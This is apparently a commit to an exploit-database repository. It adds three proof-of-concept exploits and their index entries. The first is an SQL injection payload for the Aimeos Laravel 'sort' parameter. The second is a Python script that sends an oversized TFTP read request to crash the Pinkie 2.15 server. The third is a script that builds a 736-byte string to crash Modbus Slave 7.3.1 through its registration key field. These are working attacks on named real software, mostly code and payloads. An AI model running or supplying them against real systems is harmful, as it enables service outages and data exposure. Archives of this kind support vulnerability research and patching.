DB: 2021-11-23

3 changes to exploits/shellcodes Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC) Modbus Slave 7.3.1 - Buffer Overflow (DoS) Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
2021-11-23 05:02:19 +00:00 · 2021-11-23 05:02:19 +00:00 · 942d2d4f25
commit 942d2d4f25
parent a4598bc3c4
4 changed files with 97 additions and 0 deletions
--- a/exploits/php/webapps/50538.txt
+++ b/exploits/php/webapps/50538.txt
@ -0,0 +1,26 @@
+# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
+# Date: 20/11/2021
+# Exploit Author: Ilker Burak ADIYAMAN
+# Vendor Homepage: https://aimeos.org
+# Software Link: https://aimeos.org/laravel-ecommerce-package
+# Version: Aimeos 2021.10 LTS
+# Tested on: MacOSX
+
+*Description:*
+
+The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.
+
+==================== 1. SQLi ====================
+
+https://127.0.0.1/default/jsonapi/review?sort=-ctime
+
+The "sort" parameter is vulnerable to SQL injection, reveals table and column names.
+
+step 1 : Copy json api GET request above.
+step 2 : Change sort parameter value to --
+
+----------------------------------------------------------------------
+Parameter: sort (GET)
+    Type: error based
+    Title: GET parameter 'sort' appears to be injectable
+    Payload: sort=--
--- a/exploits/windows/dos/50535.py
+++ b/exploits/windows/dos/50535.py
@ -0,0 +1,36 @@
+# Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-19
+# Vendor Homepage: http://www.ipuptime.net/
+# Software Link : http://ipuptime.net/PinkieSetup.zip
+# Tested Version: 2.15
+# Vulnerability Type:  Buffer Overflow (DoS) Remote
+# Tested on OS: Windows XP SP3 -  Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: Pinkie 2.15 TFTP Remote Buffer Overflow
+
+# Steps to reproduce:
+# 1. - Download and install Pinkie 2.15
+# 2. - Start TFTP Server listening on port 69
+# 3. - Run the Script from remote PC/IP
+# 4. - Crashed
+
+
+#!/usr/bin/env python3
+
+import socket
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+
+read = (
+    #Request - read
+    b'\x00\x01'  #Static - opcode
+    + b')' * 32768 +  #String - source_file (mutant, size=32768, orig val: b'File.bin')
+    b'\x00'  #Delim - delim1
+    b'netascii'  #String - transfer_mode
+    b'\x00'  #Delim - delim2
+)
+sock.sendto(read, ('192.168.1.207', 69))
+sock.recv(65535)
+
+sock.close()
--- a/exploits/windows/dos/50536.py
+++ b/exploits/windows/dos/50536.py
@ -0,0 +1,32 @@
+# Exploit Title: Modbus Slave 7.3.1 - Buffer Overflow (DoS)
+# Discovered by: Yehia Elghaly
+# Discovered Date: 2021-11-19
+# Vendor Homepage: https://www.modbustools.com/
+# Software Link : https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
+# Tested Version: 7.3.1 < 7.4.2
+# Vulnerability Type: Buffer Overflow (DoS) Local
+# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
+
+# Description: Modbus Slave 7.3.1 < 7.4.2 Buffer Overflow
+
+# Steps to reproduce:
+# 1. - Download and install Modbus Slave
+# 2. - Run the python script and it will create modbus.txt file.
+# 3. - Modbus Slave 7.3.1 < 7.4.2
+# 4. - Connection -> Connect
+# 5. - Paste the characters of txt file Registration Key
+# 6. - press "ok" button
+# 7. - Crashed
+
+#!/usr/bin/python
+
+exploit = 'A' * 736
+
+try:
+    file = open("Modbus.txt","w")
+    file.write(exploit)
+    file.close()
+
+    print("POC is created")
+except:
+    print("POC not created")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6806,6 +6806,8 @@ id,file,description,date,author,type,platform,port
 50510,exploits/windows/dos/50510.py,"AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50511,exploits/windows/dos/50511.py,"AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
 50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
+50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -44629,3 +44631,4 @@ id,file,description,date,author,type,platform,port
 50531,exploits/php/webapps/50531.rb,"SuiteCRM 7.11.18 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"M. Cory Billington",webapps,php,
 50532,exploits/ruby/webapps/50532.txt,"GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jacob Baines",webapps,ruby,
 50533,exploits/php/webapps/50533.py,"Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload",1970-01-01,"Keyvan Hardani",webapps,php,
+50538,exploits/php/webapps/50538.txt,"Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection",1970-01-01,"Ilker Burak ADIYAMAN",webapps,php,